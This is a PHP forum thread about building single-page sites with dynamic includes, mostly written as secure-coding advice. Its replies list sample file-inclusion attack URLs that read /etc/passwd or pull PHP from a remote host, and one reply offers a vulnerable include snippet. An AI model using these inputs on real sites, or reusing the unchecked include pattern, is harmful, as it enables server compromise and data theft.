[RESOLVED] 1 page, many content

shifty18

Up to now i have always created pages that are seprate and a link just goes to that pages so like index.php games.php news.php etc,

I am creating a site for someone however and they have only given me index.php and want all of the infomation inserted in to the 'content area' of the page. I know it changes the url to like index.php?news index.php?games and i use a GET command but thats about as far as i know, if someone can point me in the direction of a tutorial that will teach me how to create 1 page sites like this, be great

Thanks
Chris

shifty18

to build on this and create a better picture. An example aswell would be guests, members and admins see differnty infomation on the fight hand side so if your a guest you see login box, if you a member you see order details and certain links, if you an admin you see admin links and it would be like index.php index.php?MemberIndex index.php?AdminIndex.php

That kind of way

Thanks
Chris

shifty18

after some hunting i have looking into $_Server['PHP_SELF'] and i read this has something to do with the url changing. I was thinking of making $content = 'news.php' at the top for the home page and then this varble is changed to what ever page is presed by what navigation button so press prices and its changes to prices.php. I then made an iframe to make <iframe src='<?php include('$content') ?>' frameborder="0"></iframe> but this gives me a forbidden error and i cant see how that would change the url so i dont think thats the correct way

Can anyone help me out? Its really n00bish but i have never done it this way so never learnt

Thanks
Chris

drew010

what people usually do with that is

<?php
include("htmlheader.html"); //generic "top" of page stuff

switch(strtolower($_GET['page'])) {
  case "news": include("includes/news.php"); break;
  case "about": include("includes/about.php"); break;
  case "home": include("home.php"); break;
  case "links": include("includes/links.php"); break;
  default: include("index.php"); break;
}

include("htmlfooter.html");  //generic bottom content
?>

that way based on the index.php?page=xxxx it includes a certain page, if none is found it will use a default.

careful not to take a common shortcut like this

<?php
include($_GET['page']);
?>

while beginners like to use that, it makes for a very easy to hack page.
it enables a person to do stuff like
index.php?page=/etc/passwd
or
index.php?page=http://mysite.com/malicious_php.txt

in the first case a list of all users is shown
in the second case im able to have your site execute php code stored in a text file on my server. first the contents are included then executed by you, so i could list all the files in a directory, even use fopen and fwrite to create my own bad scripts on your server.

Frederick

Using switch() is nice, but you are still using a multiple entry for calling pages. Try the below and all you have to do is call the page=?.

What the below will do is load the requested page into the location you place the below code. Use the following as an example for linking your pages.

Page Name: about_us.php
Directory: Sub_Pages

Example 1: index.php?page=about_us
Example 2: index.php?page=Sub_Pages/about_us

<?php
$page = $_REQUEST["page"] ;
if (empty($page)) {
   $page = "Homepage"; // Default page is Homepage.php
} else {
    if (file_exists("$page.php")) { // Locate requested page
        $loadpage = include("$page.php"); // Load page
        if (!$loadpage) echo "Failed to load the requested page"; // If any errors and page fails to load
    } else {
        echo "Sorry, the requested page is not available"; // Message is no page is found
    }
}
?>

shifty18

ok that seams like a pretty easy option and was [very] roughly the lines i was going. When you state switch(strtolower($_GET['page'] however, is strolower a var you have created or does it have to be this odd word thing.

Also when creating hyper links do i use something along the lines of <a href="<?php $_Get['news'] ?> >News</a> roughly

Thanks
Chris"

drew010

even with the line
if (file_exists("$page.php"))
i can still use http and just tell my server not to parse .php files and do
index.php?page=http://myhost.com/malicious_code
and it evaluates to
http://myhost.com/malicious_code.php and file_exists will return true cause it will get an http 200 ok response and then include the remote page.

and beleive me, people will try to exploit this, as its the easiest and most common error to exploit with php. i always look out of curiousity.

drew010

strtolower is a function to convert the word to lowercase, so index.php?page=NeWS is the same as news or NEWS. and you make your links like <a href="/index.php?page=news">News</a>

scross

You should have something like this:

<?php
include 'top.html';
$action=$_GET[action];
$action=strtolower($action);
if(!$action){
echo "This is the home page";
}else if($action=="news"){
echo "This is the news page";
}else if($action=="games"){
echo "This is the games page";
}else{
echo "Unrecognised Action";
}
include 'bottom.html';
?>

This means no including, so it is safer but you have alot of code in one file. I have done this many times before and written scripts of about 500 lines lol and just 15 actions.
Scross

drew010

just because you include a file it doesnt mean its dangerous, just if you allow unsanitized user input into it. using static includes with a switch is perfectly fine, and you dont need to cram any number of pages into one with a bunch of if's.

shifty18

ok that worked and my linke clan packages works, but news.php is not displayd by default. index2.php is just sitll blank, if i click clan packages that works fine, just not news

RossC0

scross wrote:
You should have something like this:
<?php
include 'top.html';
$action=$_GET[action];
$action=strtolower($action);
if(!$action){
echo "This is the home page";
}else if($action=="news"){
echo "This is the news page";
}else if($action=="games"){
echo "This is the games page";
}else{
echo "Unrecognised Action";
}
include 'bottom.html';
?>
This means no including, so it is safer but you have alot of code in one file. I have done this many times before and written scripts of about 500 lines lol and just 15 actions.
Scross

This is nonsensical and bad practise!

Firstly your including bottom.html breaking your arguement of includes!
Secondly, its plain inefficient, you are forcing php to process a potentially large file - where the majority isn't required.

Also there is the cost of clarity - using includes provides a clean and clear approach - which allows for easier debugging and if you ever hand the code over at least its logical!

As everyone here has said just validate the include variable!

scross

lol, you have a good point there 😃 . I agree with your opinion that it makes it easier to debug. Does php run a script faster if it does includes? I think you should go with the switch method then from drew010 because it is nice and simple.
Scross

shifty18

Frederick on post number 5 works except index.php wont display news it displays clan packages page so i know it works but it doesnt display the default which is news

also when i tried to include a page which uses a require_once for teh connections page as its a login page via a database, i get this error

Warning: main(../Connections/AmmoBox.php): failed to open stream: No such file or directory in d:\program files\apache group\apache\htdocs\ammobox\Admin\AdminLogin.php on line 1

Fatal error: main(): Failed opening required '../Connections/AmmoBox.php' (include_path='.;c:\php4\pear') in d:\program files\apache group\apache\htdocs\ammobox\Admin\AdminLogin.php on line 1

shifty18

if i use drew010's method except i wouldnt use the include for the header and footer since my code would go in the 'Content area' i would simple create a case for each page that i have and my href for each link would be index.php?page=pagename

Vbabiy

If any one has a tutorials that would be nice, been look how to do this my self.

shifty18

well Vbabiy, post number 5 works almost apart from the default page as i have done this my self but i am just wondering wether drew010's option of using the switch is better so i am waiting for a reply to be post befor

drew010

shifty18 wrote:
well Vbabiy, post number 5 works almost apart from the default page as i have done this my self but i am just wondering wether drew010's option of using the switch is better so i am waiting for a reply to be post befor

the only thing really wrong with post #5 again is that its still possible to exploit if the values arent checked thoroughly. While having the .php hardcoded in the include does eliminate a lot of possibilities like getting any file that doesnt end with .php its still possible to include remote files, as well as any php file that exists on your server, even ones you may not want to show. The switch should work out ok if you dont plan on having hundreds of pages you want to use that method with; if thats the case you may want to make some sort of lookup table where the script can just check if a certain url page is allowed to be accessed and do it that way.

Vbabiy

Well I meant some that walks you through it i am very new to php and still have alot to learn. Say you build a little dummy site.. and something that will vaild the include because that is scary.. 🙂 thanks

Rodney_H_

Vbabiy,

If you are still looking for a tutorial you can check this out:

Dynamic Includes

It is well written and easy to follow. It will cast some light on what Drew was getting at I think. (I read this article a little while ago and can't remember it all, but had it bookmarked.)

I hope it helps you decide how to proceed.

Seems like Drews ideas are really a great start for you here.